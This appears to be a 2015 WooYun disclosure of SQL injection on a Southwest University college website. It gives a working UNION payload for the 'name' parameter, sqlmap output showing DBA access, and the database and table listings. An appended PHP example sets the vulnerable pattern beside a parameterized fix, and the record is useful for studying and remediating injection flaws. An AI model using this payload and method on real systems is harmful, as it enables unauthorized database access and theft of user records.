
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0156169

Vulnerability title: SQL injection in a college of Southwest University (DBA privileges)

Vendor: Southwest University

Author: 路人甲

Submitted: 2015-11-27 10:58

Fixed: 2016-01-11 15:32

Published: 2016-01-11 15:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability details

Disclosure status:

2015-11-27: Details sent to the vendor; awaiting vendor handling
2015-11-27: Vendor confirmed; details visible to the vendor only
2015-12-07: Details disclosed to core white hats and domain experts
2015-12-17: Details disclosed to regular white hats
2015-12-27: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public

Brief description:

As the title says.
Injection exists in many places, many places, many places; there are too many, so here is one.

Details:

http://hanhong.swu.edu.cn/  Hanhong College, Southwest University


GET /admin/xuesheng_add.php?id=%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Undefined%20variable:%20id%20in%20%3Cb%3E/opt/lampp/htdocs/admin/xuesheng.php%3C/b%3E%20on%20line%20%3Cb%3E109%3C/b%3E%3Cbr%20/%3E&name=-1&nianfen=2015 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://hanhong.swu.edu.cn
Cookie: PHPSESSID=qg09on74i0001f1l8tlvv64ai7
Host: hanhong.swu.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


The name parameter is injectable:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: name (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=<br /><b>Notice</b>: Undefined variable: id in <b>/opt/lampp/htdocs/admin/xuesheng.php</b> on line <b>109</b><br />&name=-1' UNION ALL SELECT NULL,CONCAT(0x717a706271,0x434f6671537576784f76565049554f62784a59666853777563714676696467546547447461744b74,0x7171627671),NULL-- -&nianfen=2015
---
web application technology: PHP 5.6.8, Apache 2.4.12
back-end DBMS: MySQL 5.1
current user: 'hanhong@localhost'
current database: 'hanhong'
current user is DBA: True
available databases [7]:
[*] cdcol
[*] hanhong
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test


There is no anti-injection protection at all. Several injection types are available; for speed, I chose UNION query.

Database: hanhong
+-------------------------------+---------+
| Table | Entries |
+-------------------------------+---------+
| common_member_count | 34117 |
| common_member_status | 34117 |
| common_member_log | 34109 |
| ucenter_memberfields | 31900 |
| common_credit_rule_log | 26457 |
| forum_statlog | 20352 |
| common_onlinetime | 19901 |
| common_district | 2677 |
| home_friendlog | 2616 |
| common_member_verify | 2293 |
| home_friend | 1671 |
| home_pokearchive | 1498 |
| home_clickuser | 1310 |
| common_stat | 865 |
| forum_post_tableid | 859 |
| common_credit_rule_log_field | 822 |
| home_poke | 806 |
| home_doing | 746 |
| common_member_field_forum | 556 |
| home_notification | 540 |
| home_docomment | 453 |
| home_picfield | 452 |
| register_student | 434 |
| forum_pollvoter | 393 |
| common_setting | 350 |
| home_pic | 334 |
| xsbmxx | 306 |
| forum_polloption | 272 |
| forum_spacecache | 272 |
| link | 247 |
| home_friend_request | 241 |
| ucenter_notelist | 232 |
| forum_debatepost | 206 |
| home_share | 205 |
| common_member_profile | 182 |
| common_stylevar | 180 |
| content | 179 |
| forum_thread | 137 |
| common_member | 127 |
| ucenter_members | 125 |
| forum_postcomment | 124 |
| home_class | 121 |
| home_comment | 113 |
| common_member_validate | 109 |
| common_block_style | 104 |
| common_syscache | 88 |
| common_smiley | 82 |
| forum_post | 76 |
| home_blog | 69 |
| common_block | 67 |
| common_template_block | 67 |
| ucenter_pms | 67 |
| common_admincp_perm | 63 |
| common_member_field_home | 63 |
| forum_poll | 63 |
| home_blogfield | 62 |
| forum_forumfield | 56 |
| forum_forum | 55 |
| forum_attachment | 52 |
| forum_attachmentfield | 51 |
| home_feed | 50 |
| common_member_profile_setting | 49 |
| common_nav | 36 |
| forum_memberrecommend | 34 |
| common_credit_rule | 29 |
| forum_modwork | 29 |
| home_album | 28 |
| common_credit_log | 26 |
| ucenter_settings | 25 |
| common_magic | 24 |
| home_visitor | 21 |
| common_usergroup | 19 |
| common_usergroup_field | 19 |
| list | 18 |
| forum_moderator | 17 |
| forum_activity | 15 |
| forum_activityapply | 15 |
| home_click | 15 |
| common_cron | 12 |
| forum_medal | 10 |
| home_favorite | 10 |
| forum_trade | 8 |
| admintea | 7 |
| common_admingroup | 7 |
| forum_postposition | 7 |
| forum_typeoption | 6 |
| ucenter_newpm | 6 |
| common_admincp_cmenu | 5 |
| common_admincp_group | 5 |
| forum_debate | 5 |
| common_regip | 4 |
| common_style | 4 |
| forum_bbcode | 4 |
| forum_onlinelist | 4 |
| forum_grouplevel | 3 |
| forum_imagetype | 3 |
| ucenter_admins | 3 |
| common_admincp_session | 2 |
| common_friendlink | 2 |
| common_magiclog | 2 |
| common_statuser | 2 |
| common_template | 2 |
| forum_tradelog | 2 |
| common_failedlogin | 1 |
| common_member_verify_info | 1 |
| common_secquestion | 1 |
| system | 1 |
| ucenter_applications | 1 |
| ucenter_failedlogins | 1 |
+-------------------------------+---------+


Extracting information is basically trivial...
DBA privileges; you know what that means.

Proof of vulnerability:

Fix recommendation:

A final reminder: SQL injection exists in multiple places.
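As an added example (not part of the original report and not the site's own code), here is the vulnerable pattern that the sqlmap output implies, beside a parameterized replacement. Only the table name register_student and the parameter names id, name and nianfen come from the report; the handler shape, the column names, the sample rows and the in-memory SQLite setup are assumptions so that the example runs offline.

```php
<?php
// Added example, not the code of hanhong.swu.edu.cn. The table name register_student
// comes from the report; the column names and the handler shape are assumptions.

// Vulnerable pattern implied by the sqlmap result: request values are concatenated
// into the SQL text, so a name of  -1' UNION ALL SELECT ...-- -  rewrites the query.
// This function only builds the string; it is never executed here.
function buildQueryVulnerable(array $params): string
{
    $name    = $params['name'] ?? '';
    $nianfen = $params['nianfen'] ?? '';
    return "SELECT id, name, nianfen FROM register_student "
         . "WHERE name = '$name' AND nianfen = '$nianfen'";
}

// Hardened pattern: validate the shape of each input, then bind it as data.
function findStudents(PDO $pdo, array $params): array
{
    $name    = (string) ($params['name'] ?? '');
    $nianfen = (string) ($params['nianfen'] ?? '');

    // nianfen is a year: reject anything that is not four digits before touching the DB.
    if (!preg_match('/^\d{4}$/', $nianfen)) {
        throw new InvalidArgumentException('nianfen must be a four-digit year');
    }

    $stmt = $pdo->prepare(
        'SELECT id, name, nianfen FROM register_student WHERE name = :name AND nianfen = :nianfen'
    );
    // Bound values travel as data, never as SQL text, so the UNION payload is
    // compared literally against the name column and matches nothing.
    $stmt->execute([':name' => $name, ':nianfen' => $nianfen]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

function connect(): PDO
{
    // In-memory SQLite so the example runs offline; on the real site this would be a
    // MySQL DSN, ideally with PDO::ATTR_EMULATE_PREPARES => false so binding is done
    // server-side. ERRMODE_EXCEPTION surfaces driver errors to the application instead
    // of relying on display_errors, which is what leaked the
    // "/opt/lampp/htdocs/admin/xuesheng.php" path inside the id parameter in the report.
    $pdo = new PDO('sqlite::memory:', null, null, [
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
    ]);
    $pdo->exec('CREATE TABLE register_student (id INTEGER PRIMARY KEY, name TEXT, nianfen TEXT)');
    // Constructed sample rows, not data from the site.
    $pdo->exec("INSERT INTO register_student (name, nianfen) VALUES ('Zhang San', '2015'), ('Li Si', '2014')");
    return $pdo;
}

// A UNION-shaped value of the same form as the report's payload, used only as input
// to show that the two code paths treat it differently.
$payload = ['name' => "-1' UNION ALL SELECT NULL,CONCAT('x'),NULL-- -", 'nianfen' => '2015'];

echo "Vulnerable query text:\n  " . buildQueryVulnerable($payload) . "\n";

$pdo = connect();
echo "Hardened query rows for the payload: " . count(findStudents($pdo, $payload)) . "\n";
echo "Hardened query rows for a real name:  " . count(findStudents($pdo, ['name' => 'Zhang San', 'nianfen' => '2015'])) . "\n";
```

Two further points follow from the sqlmap output rather than from the code: the application account ('hanhong@localhost') is reported as DBA, so even a parameterized application should connect with a dedicated account limited to the hanhong database, and display_errors should be off in production so PHP notices do not expose file paths to clients.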

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 9

Confirmed: 2015-11-27 15:12

Vendor reply:

The responsible unit has been notified. Thank you!

Latest status:

None yet